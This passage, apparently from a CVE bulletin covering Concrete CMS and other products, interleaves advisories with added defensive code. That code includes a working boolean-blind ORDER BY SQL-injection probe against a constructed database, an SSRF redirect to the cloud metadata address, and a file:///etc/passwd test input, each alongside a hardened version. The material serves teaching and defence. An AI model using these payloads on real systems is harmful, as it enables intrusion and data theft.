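ALLOWED_ORDER_COLUMNS = {"id", "name", "created_at"}            # allowlist for a hypothetical schema
_IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def order_by_blacklist(orderby: str) -> str:
    """Blacklist-style cleaning in the spirit of the flawed _clean_column(): strips a few characters only."""
    return re.sub(r"[;'\"]", "", orderby)


def order_by_allowlist(orderby: str) -> str:
    """Accept 'column [asc|desc]' only when the column is a known name; never pass the input through."""
    col, _, direction = orderby.strip().partition(" ")
    if col not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unknown sort column {col!r}")
    direction = direction.strip().upper() or "ASC"
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"bad sort direction {direction!r}")
    return f"{col} {direction}"


def quote_identifier(name: str) -> str:
    """Validate an identifier (a filter key) and quote it; identifiers cannot be bound as parameters."""
    if not _IDENT_RE.match(name):
        raise ValueError(f"invalid identifier {name!r}")
    return '"' + name + '"'


def demo_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE galleries(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO galleries VALUES (1, 'alpha'), (2, 'beta'), (3, 'gamma');
        CREATE TABLE users(id INTEGER PRIMARY KEY, password TEXT);
        INSERT INTO users VALUES (1, 'hunter22');
    """)
    return conn


def list_names(conn: sqlite3.Connection, order_clause: str) -> List[str]:
    return [row[0] for row in conn.execute(f"SELECT name FROM galleries ORDER BY {order_clause}")]


def filtered_names(conn: sqlite3.Connection, key: str, value: str) -> List[str]:
    """Identifier validated and quoted, value bound as a parameter: the shape the flawed builders lacked."""
    sql = f"SELECT name FROM galleries WHERE {quote_identifier(key)} = ?"
    return [row[0] for row in conn.execute(sql, (value,))]


def run_probe(guessed_len: int, sanitizer: Callable[[str], str]) -> Union[List[str], str]:
    """A boolean-blind ORDER BY probe: row order reveals whether the guess about users.password is right.
    The payload contains no quotes or semicolons, so a blacklist leaves it untouched."""
    payload = (f"(CASE WHEN (SELECT length(password) FROM users WHERE id=1)={guessed_len} "
               f"THEN id ELSE -id END)")
    try:
        return list_names(demo_db(), sanitizer(payload))
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    print("blacklist, guess 8:", run_probe(8, order_by_blacklist))    # ascending: guess was right
    print("blacklist, guess 7:", run_probe(7, order_by_blacklist))    # descending: guess was wrong
    print("allowlist, guess 8:", run_probe(8, order_by_allowlist))
    print("safe filter:", filtered_names(demo_db(), "name", "beta"))
```

The `filtered_names` shape is also the answer to SureCart's dot rule: when the key is validated against an identifier grammar and the value is always bound, there is no condition under which escaping is skipped.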
 
Broadcom–Automic Automation Execution with unnecessary privileges vulnerability in Broadcom Automic Automation Agent Unix on Linux x64, Linux Power 64 BE, Linux Power 64 LE, zLinux (zSeries), AIX, Solaris x64, Solaris Sparc 64 allows Privilege Escalation, Target Programs with Elevated Privileges. This issue affects Automic Automation: < 24.4.4 HF1. 2026-05-19 not yet calculated CVE-2026-8370 https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37512
 
BYD–Atto3 In BYD Atto3, an attacker can obtain an authentication key through a brute-force attack; the key is permanently available. The authentication key enables flashing of the Electronic Parking Brake (EPB) and Supplemental Restraint System (SRS) related ECUs. 2026-05-19 not yet calculated CVE-2025-61081 https://www.notion.so/BYD-Atto3-26215fb6156c8000b338db3c2011f637?source=copy_link
https://www.notion.so/CVE-2025-61081-26215fb6156c8000b338db3c2011f637
 
Centralny Instytut Ochrony Pracy – Państwowy Instytut Badawczy–STER A SQL injection vulnerability has been identified in STER. Improper neutralization of user-provided input in multiple Search Filters allows SQL injection attacks. It allows an authenticated attacker to view sensitive data such as data belonging to other users, or any other data that the application itself is able to access. This issue was fixed in version 9.5. 2026-05-22 not yet calculated CVE-2026-25606 https://cert.pl/posts/2026/05/CVE-2026-25606
https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480
 
Centralny Instytut Ochrony Pracy – Państwowy Instytut Badawczy–STER Use of a weak password encoding algorithm in STER software allows the value of a password to be guessed after analyzing how passwords with known values are encoded. This issue was fixed in version 9.5. 2026-05-22 not yet calculated CVE-2026-25607 https://cert.pl/posts/2026/05/CVE-2026-25606
https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480
 
Centralny Instytut Ochrony Pracy – Państwowy Instytut Badawczy–STER STER uses unencrypted TCP traffic to transmit data over the network. This allows an attacker to conduct a man-in-the-middle attack and obtain sensitive data such as passwords, personal data, or authentication tokens. This issue was fixed in version 9.5. 2026-05-22 not yet calculated CVE-2026-25608 https://cert.pl/posts/2026/05/CVE-2026-25606
https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480
 
Chroma–ChromaDB A pre-authentication, code injection vulnerability in version 1.0.0 or later of the ChromaDB Python project allows an unauthenticated attacker to run arbitrary code on the server by sending a malicious model repository and trust_remote_code set to true in the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint. 2026-05-18 not yet calculated CVE-2026-45829 https://www.hiddenlayer.com/research/chromatoast-served-pre-auth
https://github.com/chroma-core/chroma/issues/6717
 
ClipBucket–ClipBucket v5 v.5.5.2 An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components 2026-05-22 not yet calculated CVE-2026-37470 http://clipbucket.com
https://medium.com/@arpit03sharma2003/cve-2026-37470-clickjacking-vulnerability-in-clipbucket-v5-leads-to-credential-theft-and-8415def7804a
 
CODESYS–Visualization The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session. 2026-05-21 not yet calculated CVE-2026-0393 https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage disclosure via a missing permission check in the usage controller. Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.9 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. 2026-05-21 not yet calculated CVE-2026-6826 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS In Concrete CMS 9.5.0 and below, the submit_password() method in concrete/controllers/single_page/download_file.php allows unauthorized file access, since downloading permission-restricted files bypasses the view_file permission check. Files without passwords can be downloaded, and any user who knows a file’s password can download that password-protected file regardless of whether they have permission to access it. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Youssef Eid for reporting. 2026-05-21 not yet calculated CVE-2026-7879 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is subject to Insecure Direct Object Reference (IDOR) in the Express Entry Detail block via the exEntryID parameter. This IDOR leads to unauthorized access to all Express form submissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. 2026-05-21 not yet calculated CVE-2026-7881 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to unauthorized file deletion due to an Inverted CSRF token check in the DeleteFile controller. The code throws an error when the token IS valid and proceeds with file deletion when the token is invalid or missing. This effectively disables CSRF protection for the file deletion endpoint, allowing cross-site request forgery attacks against users who have permission to edit conversation messages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector of CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. 2026-05-21 not yet calculated CVE-2026-7882 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR in AddMessage/UpdateMessage via the attachments[] parameter, which can lead to file permission bypass. The `AddMessage` and `UpdateMessage` conversation controllers accept user-supplied file attachment IDs and load files directly via `$em->find(File::class, $attachmentID)` without checking per-file permissions (`canViewFile()`). A user who can post in any conversation can reference any file in the CMS file manager by its sequential ID, effectively bypassing the file permission system. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. If a site truly has private files, the owner should set up a private storage location https://documentation.concretecms.org/user-guide/editors-reference/dashboard/system-and-maintenance/files/file-storage-locations outside of the webroot so that permissions can be checked on view as well. That way, even if an authorized user attaches a file, or otherwise links to it, unauthorized users won’t be able to view the file. 2026-05-21 not yet calculated CVE-2026-7886 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS For Concrete CMS 9.5.0 and below, OAuth 2.0 Authorization-Code Handler Bypasses Account Status. A user with uIsActive=0 (suspended, banned, terminated employee) can still authenticate via OAuth and receive valid API tokens. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N. Thanks 0x4c616e for reporting. 2026-05-21 not yet calculated CVE-2026-7887 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS In Concrete CMS 9.5.0 and below, the RSS Displayer block accepts a feed URL from any page editor and fetches it server-side without validation enabling redirect-to-internal bypasses.  The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:N. 2026-05-21 not yet calculated CVE-2026-7890 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
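The RSS Displayer entry above, and the two OFBiz SSRF entries earlier in this list, are server-side fetches of a user-supplied URL. The trap the Concrete advisory names is the redirect: checking the first URL is not enough when the feed host can answer with a `302` to an internal address. The code below is an added example, not Concrete CMS or OFBiz code: the DNS answers and HTTP responses are stubbed in constructed tables so it runs offline, and the two public addresses in the fake DNS are placeholders.

```python
import ipaddress
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

Resolver = Callable[[str], List[str]]                            # hostname -> list of IP strings
Fetcher = Callable[[str], Tuple[int, Dict[str, str], bytes]]     # url -> (status, headers, body)


def is_public_ip(ip: str) -> bool:
    """True only for globally routable unicast addresses (rejects RFC 1918, loopback, link-local, ...)."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not (addr.is_multicast or addr.is_loopback or addr.is_link_local)


def check_target(url: str, resolve: Resolver) -> str:
    """Validate scheme and every address the host resolves to; return the host or raise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise PermissionError(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname
    if not host:
        raise PermissionError("missing host")
    try:
        addrs = [str(ipaddress.ip_address(host))]     # literal IPv4/IPv6 address
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        raise PermissionError(f"{host} did not resolve")
    for a in addrs:
        if not is_public_ip(a):
            raise PermissionError(f"{host} resolves to non-public address {a}")
    return host


def fetch_feed(url: str, resolve: Resolver, fetch: Fetcher, max_redirects: int = 3) -> bytes:
    """Follow redirects by hand so that every hop, not just the first URL, is validated."""
    for _ in range(max_redirects + 1):
        check_target(url, resolve)
        status, headers, body = fetch(url)
        if status in (301, 302, 303, 307, 308):
            location = headers.get("Location")
            if not location:
                raise ValueError("redirect without Location header")
            url = urljoin(url, location)
            continue
        return body
    raise PermissionError("too many redirects")


# Constructed DNS and HTTP behaviour: feeds.example.com redirects to the cloud metadata address.
FAKE_DNS = {"feeds.example.com": ["93.184.216.34"], "cdn.example.net": ["93.184.216.35"]}
FAKE_HTTP = {
    "https://feeds.example.com/rss": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "https://cdn.example.net/feed.xml": (200, {}, b"<rss/>"),
    "http://169.254.169.254/latest/meta-data/": (200, {}, b"ami-id\n"),
}


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


def fake_fetch(url: str) -> Tuple[int, Dict[str, str], bytes]:
    return FAKE_HTTP[url]


def fetch_feed_result(url: str) -> str:
    """Outcome summary using the stubbed network (for the demo and tests)."""
    try:
        return "ok " + fetch_feed(url, fake_resolve, fake_fetch).decode()
    except (PermissionError, ValueError) as e:
        return "rejected " + str(e)


if __name__ == "__main__":
    for u in ("https://cdn.example.net/feed.xml", "https://feeds.example.com/rss", "file:///etc/passwd"):
        print(u, "->", fetch_feed_result(u))
```

Validating the resolved address and then letting an HTTP library resolve the name again leaves a DNS-rebinding window; a production fetcher should connect to the address it checked and set the `Host` header itself, or route all outbound fetches through an egress proxy that enforces the same allowlist.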
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below fails to sanitize path traversal sequences in the ptComposerFormLayoutSetControlCustomTemplate field when saving page type composer form layouts. An authenticated rogue administrator with composer form editing rights can exploit this to include arbitrary readable files on the server. Combined with the file uploader’s extension-only validation (which permits PHP code in files saved with image extensions like .png), this can result in authenticated remote code execution. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 9.4 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8134 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to Remote Code Execution due to insecure deserialization in the ExpressEntryList block controller. A rogue administrator with privileges to add blocks to an area can bypass the intended protection mechanism (_fromCIF === true), which normally restricts malicious inputs over form POST requests, by leveraging the REST API functionality. Because the REST API parses requests using json_decode(), the string “true” is evaluated as a strict PHP Boolean(true). This bypass allows the attacker to inject a malicious serialized payload into the block’s filterFields database column. The payload is subsequently executed when the block’s data is viewed or edited by an administrator, leading to complete server takeover (RCE). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with a vector of CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks Nguyễn Văn Thiện https://github.com/Thien225409 for reporting. 2026-05-21 not yet calculated CVE-2026-8135 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via the external-link page cvName, because updateCollectionAliasExternal skips sanitization. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8139 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/install/download/<remoteId>. The download() method in concrete/controllers/single_page/dashboard/extend/install.php checks only the canInstallPackages() permission before fetching a remote marketplace package and writing it to the server’s DIR_PACKAGES directory. Because the endpoint is a state-changing GET route with no token enforcement, an attacker who can cause an authenticated administrator to visit a crafted page can force an arbitrary marketplace package to be downloaded. In order to be vulnerable, the victim must pass canInstallPackages() and the site must be connected to the Concrete marketplace. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. 2026-05-21 not yet calculated CVE-2026-8140 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via the OAuth integration name. The OAuth authorize template renders the integration name (admin-controlled) through Concrete’s t() translation helper as a sprintf-style format. The <strong>…</strong> wrap is built by PHP string interpolation before t() runs, so the integration name lands in the translated output as raw HTML. A rogue admin could potentially snoop on login submissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8197 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below has Stored XSS on the height parameter. The controller does not validate or sanitize $height. Any user with editor privileges can inject malicious JavaScript that executes in the context of any visitor’s browser, potentially leading to session hijacking, credential theft, or other malicious actions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Alfin Joseph for reporting. 2026-05-21 not yet calculated CVE-2026-8203 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to authorization Bypass in the Calendar Event Frontend Dialog which can allow cross-calendar data disclosure. A public calendar block can be used as a pivot point to access private calendar data. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. 2026-05-21 not yet calculated CVE-2026-8204 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to authorization bypass in the Calendar Block since action_get_events does not check canView on the calendar which results in restricted event details being disclosed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks lalalala5678 for reporting. 2026-05-21 not yet calculated CVE-2026-8205 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a missing authentication gate. The endpoint /ccm/system/dialogs/file/usage/{fID} accepts an integer file ID in the URL and returns internal site structure data (page IDs, versions, URL paths) to anyone who sends a GET request. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. 2026-05-21 not yet calculated CVE-2026-8236 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR. The `/ccm/frontend/conversations/message_detail` endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. 2026-05-21 not yet calculated CVE-2026-8237 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR. The `/ccm/frontend/conversations/message_page` endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. 2026-05-21 not yet calculated CVE-2026-8238 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR. The `/ccm/frontend/conversations/get_rating` endpoint confirms existence and returns the rating score for any message by ID. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. 2026-05-21 not yet calculated CVE-2026-8239 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to unauthenticated page metadata disclosure across every page with a configured summary template, revealing the existence of private, draft, and restricted pages while leaking title, path, description, and author information. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. 2026-05-21 not yet calculated CVE-2026-8240 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
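The calendar, conversation, file-usage and page-metadata entries above share one root cause: an endpoint takes an integer ID, loads the object, and returns it without asking whether the caller may see the page or calendar that owns it. The following is an added example, not Concrete CMS code; Page, Message and the two handlers are illustrative stand-ins and the data store is constructed. It shows the lookup-by-ID pattern as written and then with the owning object's view permission checked, returning the same answer for unknown and forbidden IDs so the endpoint no longer confirms existence (the get_rating entry).

```php
<?php
// Added example (not Concrete CMS code). Illustrative stand-ins for the
// "fetch by ID, return it" pattern behind the IDOR entries above.

declare(strict_types=1);

final class Page
{
    public function __construct(public int $id, public bool $isPublic) {}

    // Members-only pages are viewable only by a logged-in user.
    public function canView(?string $viewer): bool
    {
        return $this->isPublic || $viewer !== null;
    }
}

final class Message
{
    public function __construct(public int $id, public Page $page, public string $body) {}
}

// Constructed data store: one public page, one members-only page.
$pages = [1 => new Page(1, true), 2 => new Page(2, false)];
$messages = [
    10 => new Message(10, $pages[1], 'Welcome!'),
    11 => new Message(11, $pages[2], 'Internal: rotate the API key on Friday'),
];

// Vulnerable: any ID that exists is served, so an unauthenticated caller can
// walk the ID space and read every message, restricted pages included.
function messageDetailVulnerable(array $messages, int $id): ?string
{
    return isset($messages[$id]) ? $messages[$id]->body : null;
}

// Hardened: resolve the owning object and check the viewer's permission on it
// before anything about the message is returned. Unknown and forbidden IDs get
// the same null so the endpoint does not act as an existence oracle.
function messageDetailHardened(array $messages, int $id, ?string $viewer): ?string
{
    $m = $messages[$id] ?? null;
    if ($m === null || !$m->page->canView($viewer)) {
        return null;
    }
    return $m->body;
}

// Walk three IDs as an anonymous caller: a public message, a members-only
// message, and one that does not exist.
foreach ([10, 11, 12] as $id) {
    printf("id %d  vulnerable: %-42s hardened(anon): %s\n",
        $id,
        var_export(messageDetailVulnerable($messages, $id), true),
        var_export(messageDetailHardened($messages, $id, null), true));
}
```

The check has to be made against the container that carries the permission (the page, calendar or file set), not the message itself, because that is where the editor configured access; checking only that the ID exists, or only that the caller is logged in, reproduces the bug for any member of the site.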
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to Reflected XSS in Legacy Pagination via HTML attribute injection. Concrete\Core\Legacy\Pagination builds pagination links by raw-interpolating its $URL field into href="" (<a href="{$linkURL}" …>). Any authenticated admin or report viewer with access to `/dashboard/reports/forms/legacy` who clicks the crafted URL fires the payload in their session. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8245 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to password change without reauthorization and session-hardening bypass. The user-profile edit controller passes the entire raw POST array to UserInfo::update() without field whitelisting. This allows a password change without the current password being required, and also allows registered users to disable the per-user IP pinning in the session validator that is meant to detect session hijacking. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks 0x4c616e for reporting. 2026-05-21 not yet calculated CVE-2026-8327 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
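The profile-edit entry is a mass-assignment bug: whatever keys the browser sends become columns the model writes. The following is an added example, not Concrete CMS code. UserInfo::update() is a stand-in that writes every key it is given; the field names uName, uEmail, uTimezone, uPassword and uSessionLockIP are assumptions chosen to mirror the description (the real column for the IP-pinning flag is not named on the page). It shows the raw-POST handler beside one that whitelists the editable fields and puts the password change behind a current-password check.

```php
<?php
// Added example (not Concrete CMS code). Field names are assumptions;
// uSessionLockIP is a hypothetical name for the per-user IP-pinning flag.

declare(strict_types=1);

final class UserInfo
{
    public array $attrs;

    public function __construct(array $attrs)
    {
        $this->attrs = $attrs;
    }

    // Models a generic update() that stores every key it is handed. Whether it
    // hashes uPassword or stores it as given does not change the outcome.
    public function update(array $data): void
    {
        foreach ($data as $k => $v) {
            $this->attrs[$k] = $v;
        }
    }
}

// Vulnerable: the whole request body is forwarded, so any column the model
// knows about (password, session-hardening flag) can be set by the user.
function editProfileVulnerable(UserInfo $user, array $post): void
{
    $user->update($post);
}

// Hardened: only the fields the profile form is meant to change are copied,
// and a password change is handled separately behind a current-password check.
function editProfileHardened(UserInfo $user, array $post): void
{
    $allowed = ['uName', 'uEmail', 'uTimezone'];
    $clean = array_intersect_key($post, array_flip($allowed));
    $user->update($clean);

    if (isset($post['uPasswordNew'])) {
        $current = (string) ($post['uPasswordCurrent'] ?? '');
        if (!password_verify($current, $user->attrs['uPassword'])) {
            throw new RuntimeException('current password required to change password');
        }
        $user->update(['uPassword' => password_hash((string) $post['uPasswordNew'], PASSWORD_DEFAULT)]);
    }
}

function freshUser(): UserInfo
{
    return new UserInfo([
        'uName'          => 'alice',
        'uPassword'      => password_hash('original', PASSWORD_DEFAULT),
        'uSessionLockIP' => 1,
    ]);
}

// Constructed request: an ordinary profile edit with two extra keys smuggled in.
$post = [
    'uName'          => 'alice',
    'uPassword'      => password_hash('attacker-chosen', PASSWORD_DEFAULT),
    'uSessionLockIP' => 0,
];

$u1 = freshUser();
editProfileVulnerable($u1, $post);
printf("vulnerable: attacker password accepted=%s, ip pinning=%d\n",
    var_export(password_verify('attacker-chosen', $u1->attrs['uPassword']), true),
    $u1->attrs['uSessionLockIP']);

$u2 = freshUser();
editProfileHardened($u2, $post);
printf("hardened:   original password intact=%s, ip pinning=%d\n",
    var_export(password_verify('original', $u2->attrs['uPassword']), true),
    $u2->attrs['uSessionLockIP']);

// A password change without the correct current password is refused.
try {
    editProfileHardened($u2, ['uPasswordNew' => 'new-secret', 'uPasswordCurrent' => 'wrong']);
} catch (RuntimeException $e) {
    echo "hardened:   ", $e->getMessage(), PHP_EOL;
}
```

The whitelist is the important half: a current-password check on its own does nothing if the same handler still lets `uPassword` or the session flag through another key.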
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR in surveys. To be vulnerable, a site would have to be configured in such a way that both public and private surveys are present on the site. An unauthenticated attacker can vote in the restricted survey by submitting the restricted optionID through the public survey’s endpoint. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Zer0daySec https://github.com/Zee99y for reporting. 2026-05-21 not yet calculated CVE-2026-8337 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to CSRF via BackendFile::approveVersion. Victim with edit_file_contents permission is CSRF’d into publishing an attacker-chosen previously-uploaded version (downgrade to an older version of a file, or activation of a co-editor’s unpublished version). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. 2026-05-22 not yet calculated CVE-2026-8340 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
